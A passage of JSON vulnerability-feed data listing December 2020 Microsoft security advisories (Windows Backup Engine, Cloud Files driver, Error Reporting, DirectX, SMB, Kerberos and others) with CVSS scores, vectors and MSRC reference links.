"cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*"]}], "mscve": [{"lastseen": "2022-03-17T17:50:47", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964. 
\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Backup Engine Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-16960", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16960", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T17:50:46", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16964. 
\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Backup Engine Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-16963", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16963", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T17:50:47", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964. 
\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Backup Engine Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-16961", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16961", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T17:50:46", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16963, CVE-2020-16964. 
\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Backup Engine Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-16962", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16962", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T17:50:48", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964. 
\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Backup Engine Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-16959", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16959", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T17:50:48", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964. 
\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Backup Engine Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-16958", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16958", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T17:50:46", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963. 
\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Backup Engine Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-16964", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16964", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T17:50:54", "description": "Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17103, CVE-2020-17136. 
\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17103", "CVE-2020-17134", "CVE-2020-17136"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17134", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17134", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-17T17:50:55", "description": "Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17134, CVE-2020-17136. 
\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17103", "CVE-2020-17134", "CVE-2020-17136"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17103", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17103", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T17:50:53", "description": "Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17103, CVE-2020-17134. 
\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17103", "CVE-2020-17134", "CVE-2020-17136"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17136", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17136", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-17T17:50:53", "description": "Windows Error Reporting Information Disclosure Vulnerability This CVE ID is unique from CVE-2020-17094. 
\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Error Reporting Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17094", "CVE-2020-17138"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17138", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17138", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-17T17:50:56", "description": "Windows Error Reporting Information Disclosure Vulnerability This CVE ID is unique from CVE-2020-17138. 
\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Error Reporting Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17094", "CVE-2020-17138"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17094", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17094", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:24:17", "description": "DirectX Graphics Kernel Elevation of Privilege Vulnerability \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "DirectX Graphics Kernel Elevation of Privilege Vulnerability", 
"bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17137"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17137", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17137", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:24:20", "description": "Windows Lock Screen Security Feature Bypass Vulnerability \n", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Lock Screen Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17099"], 
"modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17099", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17099", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:24:16", "description": "Windows Overlay Filter Security Feature Bypass Vulnerability \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Overlay Filter Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17139"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17139", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17139", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:24:01", "description": "Windows SMB Information Disclosure Vulnerability \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", 
"baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows SMB Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17140", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17140", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:24:07", "description": "Kerberos Security Feature Bypass Vulnerability \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Kerberos Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", 
"integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16996"], "modified": "2021-03-12T08:00:00", "id": "MS:CVE-2020-16996", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16996", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-12-06T18:24:21", "description": "Windows Digital Media Receiver Elevation of Privilege Vulnerability \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Digital Media Receiver Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, 